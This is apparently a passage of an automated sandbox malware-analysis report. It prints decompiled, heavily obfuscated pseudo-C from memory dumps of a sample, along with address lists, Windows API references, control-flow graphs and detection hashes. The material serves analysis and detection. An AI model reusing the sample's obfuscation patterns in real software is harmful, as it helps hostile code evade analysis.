                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				ExitProcess( *( *((intOrPtr*)(_t520 + 0x64)) + 0xc0));
                                                                                                                                                                                                                                                                      			}






























                                                                                                                                                                                                                                                                      0x01181f81
                                                                                                                                                                                                                                                                      0x01181f85
                                                                                                                                                                                                                                                                      0x01181f8b
                                                                                                                                                                                                                                                                      0x01181f98
                                                                                                                                                                                                                                                                      0x01181f9e
                                                                                                                                                                                                                                                                      0x01181fa5
                                                                                                                                                                                                                                                                      0x01181fac
                                                                                                                                                                                                                                                                      0x01181fb3
                                                                                                                                                                                                                                                                      0x01181fba
                                                                                                                                                                                                                                                                      0x01181fc1
                                                                                                                                                                                                                                                                      0x01181fd4
                                                                                                                                                                                                                                                                      0x01181fe5
                                                                                                                                                                                                                                                                      0x01182134
                                                                                                                                                                                                                                                                      0x01182137
                                                                                                                                                                                                                                                                      0x01182159
                                                                                                                                                                                                                                                                      0x0118215f
                                                                                                                                                                                                                                                                      0x01182172
                                                                                                                                                                                                                                                                      0x01182179
                                                                                                                                                                                                                                                                      0x0118218b
                                                                                                                                                                                                                                                                      0x0118219b
                                                                                                                                                                                                                                                                      0x011821af
                                                                                                                                                                                                                                                                      0x011821bc
                                                                                                                                                                                                                                                                      0x011821bf
                                                                                                                                                                                                                                                                      0x011821c5
                                                                                                                                                                                                                                                                      0x011821dc
                                                                                                                                                                                                                                                                      0x011821dc
                                                                                                                                                                                                                                                                      0x011821e0
                                                                                                                                                                                                                                                                      0x011821f7
                                                                                                                                                                                                                                                                      0x011821fc
                                                                                                                                                                                                                                                                      0x011821ff
                                                                                                                                                                                                                                                                      0x011821ff
                                                                                                                                                                                                                                                                      0x0118215f
                                                                                                                                                                                                                                                                      0x01181feb
                                                                                                                                                                                                                                                                      0x01181ff1
                                                                                                                                                                                                                                                                      0x01181ffd
                                                                                                                                                                                                                                                                      0x01182008
                                                                                                                                                                                                                                                                      0x01182014
                                                                                                                                                                                                                                                                      0x01182020
                                                                                                                                                                                                                                                                      0x0118202b
                                                                                                                                                                                                                                                                      0x01182034
                                                                                                                                                                                                                                                                      0x01182040
                                                                                                                                                                                                                                                                      0x0118204b
                                                                                                                                                                                                                                                                      0x01182051
                                                                                                                                                                                                                                                                      0x0118205d
                                                                                                                                                                                                                                                                      0x01182063
                                                                                                                                                                                                                                                                      0x01182067
                                                                                                                                                                                                                                                                      0x0118206b
                                                                                                                                                                                                                                                                      0x0118206f
                                                                                                                                                                                                                                                                      0x01182073
                                                                                                                                                                                                                                                                      0x01182077
                                                                                                                                                                                                                                                                      0x01182080
                                                                                                                                                                                                                                                                      0x0118208b
                                                                                                                                                                                                                                                                      0x01182097
                                                                                                                                                                                                                                                                      0x011820a3
                                                                                                                                                                                                                                                                      0x011820ae
                                                                                                                                                                                                                                                                      0x011820ba
                                                                                                                                                                                                                                                                      0x011820c3
                                                                                                                                                                                                                                                                      0x011820c9
                                                                                                                                                                                                                                                                      0x011820cf
                                                                                                                                                                                                                                                                      0x011820d3
                                                                                                                                                                                                                                                                      0x011820d7
                                                                                                                                                                                                                                                                      0x011820db
                                                                                                                                                                                                                                                                      0x011820df
                                                                                                                                                                                                                                                                      0x011820e3
                                                                                                                                                                                                                                                                      0x011820e4
                                                                                                                                                                                                                                                                      0x011820e9
                                                                                                                                                                                                                                                                      0x011820ec
                                                                                                                                                                                                                                                                      0x011820f8
                                                                                                                                                                                                                                                                      0x011820fb
                                                                                                                                                                                                                                                                      0x01182101
                                                                                                                                                                                                                                                                      0x01182106
                                                                                                                                                                                                                                                                      0x0118210c
                                                                                                                                                                                                                                                                      0x0118210c
                                                                                                                                                                                                                                                                      0x01181fe5
                                                                                                                                                                                                                                                                      0x0118220d
                                                                                                                                                                                                                                                                      0x0118242b
                                                                                                                                                                                                                                                                      0x01182437
                                                                                                                                                                                                                                                                      0x0118243e
                                                                                                                                                                                                                                                                      0x01182444
                                                                                                                                                                                                                                                                      0x0118244a
                                                                                                                                                                                                                                                                      0x0118245e
                                                                                                                                                                                                                                                                      0x01182487
                                                                                                                                                                                                                                                                      0x0118248a
                                                                                                                                                                                                                                                                      0x01182490
                                                                                                                                                                                                                                                                      0x01182497
                                                                                                                                                                                                                                                                      0x011824ae
                                                                                                                                                                                                                                                                      0x011824c3
                                                                                                                                                                                                                                                                      0x011824c9
                                                                                                                                                                                                                                                                      0x011824cf
                                                                                                                                                                                                                                                                      0x011824d5
                                                                                                                                                                                                                                                                      0x011824e3
                                                                                                                                                                                                                                                                      0x011824fa
                                                                                                                                                                                                                                                                      0x01182515
                                                                                                                                                                                                                                                                      0x01182518
                                                                                                                                                                                                                                                                      0x01182521
                                                                                                                                                                                                                                                                      0x0118252e
                                                                                                                                                                                                                                                                      0x01182549
                                                                                                                                                                                                                                                                      0x01182570
                                                                                                                                                                                                                                                                      0x01182570
                                                                                                                                                                                                                                                                      0x01182572
                                                                                                                                                                                                                                                                      0x01182213
                                                                                                                                                                                                                                                                      0x01182219
                                                                                                                                                                                                                                                                      0x0118221f
                                                                                                                                                                                                                                                                      0x01182228
                                                                                                                                                                                                                                                                      0x01182234
                                                                                                                                                                                                                                                                      0x0118223d
                                                                                                                                                                                                                                                                      0x01182248
                                                                                                                                                                                                                                                                      0x0118224e
                                                                                                                                                                                                                                                                      0x0118225a
                                                                                                                                                                                                                                                                      0x01182281
                                                                                                                                                                                                                                                                      0x0118228d
                                                                                                                                                                                                                                                                      0x01182290
                                                                                                                                                                                                                                                                      0x0118229c
                                                                                                                                                                                                                                                                      0x011822a1
                                                                                                                                                                                                                                                                      0x011822a6
                                                                                                                                                                                                                                                                      0x011822ac
                                                                                                                                                                                                                                                                      0x011822b7
                                                                                                                                                                                                                                                                      0x011822c0
                                                                                                                                                                                                                                                                      0x011822c9
                                                                                                                                                                                                                                                                      0x011822d4
                                                                                                                                                                                                                                                                      0x011822e0
                                                                                                                                                                                                                                                                      0x011822e9
                                                                                                                                                                                                                                                                      0x011822f4
                                                                                                                                                                                                                                                                      0x01182300
                                                                                                                                                                                                                                                                      0x0118230c
                                                                                                                                                                                                                                                                      0x01182312
                                                                                                                                                                                                                                                                      0x01182339
                                                                                                                                                                                                                                                                      0x01182345
                                                                                                                                                                                                                                                                      0x01182350
                                                                                                                                                                                                                                                                      0x01182368
                                                                                                                                                                                                                                                                      0x01182386
                                                                                                                                                                                                                                                                      0x0118238b
                                                                                                                                                                                                                                                                      0x01182391
                                                                                                                                                                                                                                                                      0x011823a3
                                                                                                                                                                                                                                                                      0x011823a3
                                                                                                                                                                                                                                                                      0x011823ac
                                                                                                                                                                                                                                                                      0x0118236a
                                                                                                                                                                                                                                                                      0x0118236d
                                                                                                                                                                                                                                                                      0x01182373
                                                                                                                                                                                                                                                                      0x01182379
                                                                                                                                                                                                                                                                      0x01182379
                                                                                                                                                                                                                                                                      0x011823b5
                                                                                                                                                                                                                                                                      0x011823c1
                                                                                                                                                                                                                                                                      0x011823c7
                                                                                                                                                                                                                                                                      0x01182416
                                                                                                                                                                                                                                                                      0x01182416
                                                                                                                                                                                                                                                                      0x0118241d
                                                                                                                                                                                                                                                                      0x011823c9
                                                                                                                                                                                                                                                                      0x011823e3
                                                                                                                                                                                                                                                                      0x011823ea
                                                                                                                                                                                                                                                                      0x011823f0
                                                                                                                                                                                                                                                                      0x011823f6
                                                                                                                                                                                                                                                                      0x011823f6
                                                                                                                                                                                                                                                                      0x01182423
                                                                                                                                                                                                                                                                      0x0118257f

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 01182179
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0118243E
                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0118248A
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 01182549
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0118257F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: HandleProcess$ByteCharCloseCurrentExitModuleMultiWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2949264313-0
                                                                                                                                                                                                                                                                      • Opcode ID: 571623863fe11898649d53fdf6e2e9bc9b3f55c99f68dcdf50b4a5a03e75e5ba
                                                                                                                                                                                                                                                                      • Instruction ID: 54b7831a1c933310c546cda22b2eeab6e34b16e2c0ba2fc494a8124f74afc26e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 571623863fe11898649d53fdf6e2e9bc9b3f55c99f68dcdf50b4a5a03e75e5ba
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE22A3B5A00248DFDB08DF98D594AAE7BB6FF88304F148229F9199B345D734E841CF54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 248 1183e70-1183ee2 249 1183ee8-1183ef3 248->249 250 11841eb-1184216 248->250 251 1183ef9-1183f7d call 1183450 249->251 252 11840ec-118411f 249->252 253 1184218-1184230 250->253 254 1184233-1184242 250->254 261 1183f7f-1183fa5 251->261 262 1183fa7-1183fb9 251->262 256 11841e9 252->256 257 1184125-1184133 252->257 253->254 256->254 258 118413e-1184148 257->258 258->256 260 118414e-11841e4 CreateFileMappingA 258->260 260->258 264 1183fbf-1184067 call 1198570 call 11847e0 261->264 262->264 268 118406c-11840e7 call 11814c0 264->268 268->256
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01183E70() {
                                                                                                                                                                                                                                                                      				intOrPtr _t189;
                                                                                                                                                                                                                                                                      				intOrPtr _t211;
                                                                                                                                                                                                                                                                      				signed int _t224;
                                                                                                                                                                                                                                                                      				intOrPtr _t302;
                                                                                                                                                                                                                                                                      				intOrPtr _t303;
                                                                                                                                                                                                                                                                      				intOrPtr _t304;
                                                                                                                                                                                                                                                                      				intOrPtr _t347;
                                                                                                                                                                                                                                                                      				intOrPtr* _t348;
                                                                                                                                                                                                                                                                      				void* _t350;
                                                                                                                                                                                                                                                                      				void* _t359;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t348 = _t350 - 0x60;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x50) =  *((intOrPtr*)(_t348 + 0x74)) + 0xef;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x4c) =  *(_t348 + 0x68) + 0x33;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x54) =  *(_t348 + 0x68) ^ 0x000002dc;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t348 + 0x3c)) =  *((intOrPtr*)(_t348 + 0x6c)) + 0x221;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x48) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x40) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x58) =  *((intOrPtr*)(_t348 + 0x6c)) - 0x92;
                                                                                                                                                                                                                                                                      				 *(_t348 + 0x5c) =  *(_t348 + 0x70) - 0x26d4;
                                                                                                                                                                                                                                                                      				if( *(_t348 + 0x50) <  *(_t348 + 0x5c) + 0x2622) {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xc4)) != ( *(_t348 + 0x54) *  *(_t348 + 0x54) |  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc81))) {
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x5c) =  *(_t348 + 0x5c) +  *0x0121D6A8 - 0x26d4;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					if( *(_t348 + 0x40) >  *(_t348 + 0x58) + 0x2fb) {
                                                                                                                                                                                                                                                                      						_t347 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t302 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t302 + 0xbadc81)) > ( *( *((intOrPtr*)(_t348 + 0x7c)) + 0x78) |  *(_t347 + 0x14)) + 0x2598) {
                                                                                                                                                                                                                                                                      							_t189 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t120 = _t189 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t348 + 0x44)) =  *_t120;
                                                                                                                                                                                                                                                                      							while( *((intOrPtr*)(_t348 + 0x44)) <=  *(_t348 + 0x5c) *  *(_t348 + 0x5c)) {
                                                                                                                                                                                                                                                                      								_t303 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x40) = ( *(_t348 + 0x54) &  *(_t303 + 0xbadca9)) *  *(_t348 + 0x58);
                                                                                                                                                                                                                                                                      								_t304 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x3c) =  *(_t348 + 0x40) -  *((intOrPtr*)(_t304 + 0xbadbed));
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x38) =  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x3c) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc51);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x34) =  *(_t348 + 0x58) &  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x8c);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x30) =  *(_t348 + 0x48) *  *(_t348 + 0x48) |  *(_t348 + 0x50);
                                                                                                                                                                                                                                                                      								 *(_t348 - 0x2c) =  *(_t348 + 0x4c) + 0x2598;
                                                                                                                                                                                                                                                                      								CreateFileMappingA( *(_t348 - 0x40),  *(_t348 - 0x3c),  *(_t348 - 0x38),  *(_t348 - 0x34),  *(_t348 - 0x30),  *(_t348 - 0x2c));
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t348 + 0x44)) =  *((intOrPtr*)(_t348 + 0x44)) + 4;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x20)) =  *(_t348 + 0x5c) + 0x2633;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x24) =  *(_t348 + 0x58) ^ 0x000001c1;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x28) =  *(_t348 + 0x5c) ^ 0x00002598;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x2c) =  *(_t348 + 0x54) ^ 0x0000013e;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x30)) =  *(_t348 + 0x5c) + 0x2801;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x34)) =  *(_t348 + 0x50) - 0xef;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x38)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x5c) = E01183450( *((intOrPtr*)(_t348 + 0x20)),  *(_t348 + 0x24),  *(_t348 + 0x28),  *(_t348 + 0x2c),  *((intOrPtr*)(_t348 + 0x30)),  *((intOrPtr*)(_t348 + 0x34)),  *((intOrPtr*)(_t348 + 0x38)));
                                                                                                                                                                                                                                                                      						_t211 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t44 = _t211 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      						_t359 =  *_t44 -  *0x121d68c; // 0x14b95e
                                                                                                                                                                                                                                                                      						if(_t359 > 0) {
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) +  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x1c));
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							 *0x121d6cc =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xe4)) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xdc);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0xc)) =  *(_t348 + 0x4c) + 0x2a2;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x10)) =  *(_t348 + 0x50) - 0x54;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x14)) =  *((intOrPtr*)(_t348 + 0x3c)) + 0x48;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 + 0x18)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x1c) =  *(_t348 + 0x5c) ^ 0x00000111;
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x58) = E01198570( *((intOrPtr*)(_t348 + 0xc)),  *((intOrPtr*)(_t348 + 0x10)),  *((intOrPtr*)(_t348 + 0x14)),  *((intOrPtr*)(_t348 + 0x18)),  *(_t348 + 0x1c));
                                                                                                                                                                                                                                                                      						 *(_t348 - 0xc) =  *(_t348 + 0x4c) ^ 0x00000221;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 8)) = 0x121d5f0;
                                                                                                                                                                                                                                                                      						 *(_t348 - 4) =  *(_t348 + 0x48) ^ 0x00002565;
                                                                                                                                                                                                                                                                      						 *_t348 =  *(_t348 + 0x58) - 0xdc;
                                                                                                                                                                                                                                                                      						 *(_t348 + 4) =  *(_t348 + 0x50) ^ 0x000000b4;
                                                                                                                                                                                                                                                                      						 *(_t348 + 8) =  *(_t348 + 0x54) ^ 0x00000221;
                                                                                                                                                                                                                                                                      						_t224 = E011847E0( *(_t348 - 0xc),  *((intOrPtr*)(_t348 - 8)),  *(_t348 - 4),  *_t348,  *(_t348 + 4),  *(_t348 + 8)); // executed
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x54) = _t224;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x28)) =  *(_t348 + 0x58) + 0x71;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x24) =  *(_t348 + 0x54) ^ 0x00000d9a;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x20)) =  *(_t348 + 0x58) - 0x41;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x1c) =  *(_t348 + 0x5c);
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x18) =  *(_t348 + 0x48) ^ 0x0000253b;
                                                                                                                                                                                                                                                                      						 *(_t348 - 0x14) =  *(_t348 + 0x50) ^ 0x00000240;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t348 - 0x10)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x54) = E011814C0( *((intOrPtr*)(_t348 - 0x28)),  *(_t348 - 0x24),  *((intOrPtr*)(_t348 - 0x20)),  *(_t348 - 0x1c),  *(_t348 - 0x18),  *(_t348 - 0x14),  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                                                                                                                                                                      						 *(_t348 + 0x4c) =  *(_t348 + 0x4c) ^ 0x000003ba;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return  *((intOrPtr*)(_t348 + 0x3c)) + 0x81;
                                                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                                                      0x01183e71
                                                                                                                                                                                                                                                                      0x01183e84
                                                                                                                                                                                                                                                                      0x01183e8d
                                                                                                                                                                                                                                                                      0x01183e99
                                                                                                                                                                                                                                                                      0x01183ea4
                                                                                                                                                                                                                                                                      0x01183eb0
                                                                                                                                                                                                                                                                      0x01183ebc
                                                                                                                                                                                                                                                                      0x01183ec7
                                                                                                                                                                                                                                                                      0x01183ed3
                                                                                                                                                                                                                                                                      0x01183ee2
                                                                                                                                                                                                                                                                      0x01184216
                                                                                                                                                                                                                                                                      0x01184230
                                                                                                                                                                                                                                                                      0x01184230
                                                                                                                                                                                                                                                                      0x01183ee8
                                                                                                                                                                                                                                                                      0x01183ef3
                                                                                                                                                                                                                                                                      0x011840ff
                                                                                                                                                                                                                                                                      0x01184112
                                                                                                                                                                                                                                                                      0x0118411f
                                                                                                                                                                                                                                                                      0x01184125
                                                                                                                                                                                                                                                                      0x0118412a
                                                                                                                                                                                                                                                                      0x01184130
                                                                                                                                                                                                                                                                      0x0118413e
                                                                                                                                                                                                                                                                      0x01184156
                                                                                                                                                                                                                                                                      0x0118416a
                                                                                                                                                                                                                                                                      0x01184174
                                                                                                                                                                                                                                                                      0x01184181
                                                                                                                                                                                                                                                                      0x0118419c
                                                                                                                                                                                                                                                                      0x011841ab
                                                                                                                                                                                                                                                                      0x011841b8
                                                                                                                                                                                                                                                                      0x011841c3
                                                                                                                                                                                                                                                                      0x011841de
                                                                                                                                                                                                                                                                      0x0118413b
                                                                                                                                                                                                                                                                      0x0118413b
                                                                                                                                                                                                                                                                      0x0118413e
                                                                                                                                                                                                                                                                      0x01183ef9
                                                                                                                                                                                                                                                                      0x01183f02
                                                                                                                                                                                                                                                                      0x01183f0e
                                                                                                                                                                                                                                                                      0x01183f19
                                                                                                                                                                                                                                                                      0x01183f25
                                                                                                                                                                                                                                                                      0x01183f31
                                                                                                                                                                                                                                                                      0x01183f3c
                                                                                                                                                                                                                                                                      0x01183f42
                                                                                                                                                                                                                                                                      0x01183f69
                                                                                                                                                                                                                                                                      0x01183f6c
                                                                                                                                                                                                                                                                      0x01183f71
                                                                                                                                                                                                                                                                      0x01183f77
                                                                                                                                                                                                                                                                      0x01183f7d
                                                                                                                                                                                                                                                                      0x01183fb9
                                                                                                                                                                                                                                                                      0x01183f7f
                                                                                                                                                                                                                                                                      0x01183fa0
                                                                                                                                                                                                                                                                      0x01183fa0
                                                                                                                                                                                                                                                                      0x01183fc7
                                                                                                                                                                                                                                                                      0x01183fd0
                                                                                                                                                                                                                                                                      0x01183fd9
                                                                                                                                                                                                                                                                      0x01183fdf
                                                                                                                                                                                                                                                                      0x01183feb
                                                                                                                                                                                                                                                                      0x0118400a
                                                                                                                                                                                                                                                                      0x01184016
                                                                                                                                                                                                                                                                      0x01184019
                                                                                                                                                                                                                                                                      0x01184029
                                                                                                                                                                                                                                                                      0x01184034
                                                                                                                                                                                                                                                                      0x01184040
                                                                                                                                                                                                                                                                      0x0118404c
                                                                                                                                                                                                                                                                      0x01184067
                                                                                                                                                                                                                                                                      0x0118406f
                                                                                                                                                                                                                                                                      0x01184078
                                                                                                                                                                                                                                                                      0x01184084
                                                                                                                                                                                                                                                                      0x0118408d
                                                                                                                                                                                                                                                                      0x01184093
                                                                                                                                                                                                                                                                      0x0118409f
                                                                                                                                                                                                                                                                      0x011840ab
                                                                                                                                                                                                                                                                      0x011840b1
                                                                                                                                                                                                                                                                      0x011840d8
                                                                                                                                                                                                                                                                      0x011840e4
                                                                                                                                                                                                                                                                      0x011840e4
                                                                                                                                                                                                                                                                      0x011841e9
                                                                                                                                                                                                                                                                      0x01184242

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileMappingA.KERNEL32 ref: 011841DE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 524692379-0
                                                                                                                                                                                                                                                                      • Opcode ID: ac764aeb719fe52192e1c759a235f4b8180e0100dcfc444ca69cbebda1e9efd5
                                                                                                                                                                                                                                                                      • Instruction ID: a301f23f407fcc5a6859a1c3569ab185d699669c4141ab61488ea31656b5f7f7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac764aeb719fe52192e1c759a235f4b8180e0100dcfc444ca69cbebda1e9efd5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED1C271A00149DFDB18CF98D894AAABBF5FF88304F54812AFA299B355D734E841CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 315 118dedd-118dee8 SetUnhandledExceptionFilter
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118DEDD() {
                                                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t1 = SetUnhandledExceptionFilter(E0118DEE9); // executed
                                                                                                                                                                                                                                                                      				return _t1;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x0118dee2
                                                                                                                                                                                                                                                                      0x0118dee8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000DEE9,0118DAE0), ref: 0118DEE2
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1696bbd92372a72a914a90b4eb2b40bdaf15189a59fff4b27fb75c6c6fdbc62a
                                                                                                                                                                                                                                                                      • Instruction ID: 8f779ad5d909f3e287f94dd74ac8a818d18610a1bb56b616491624cdf1a8082e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1696bbd92372a72a914a90b4eb2b40bdaf15189a59fff4b27fb75c6c6fdbc62a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 65%
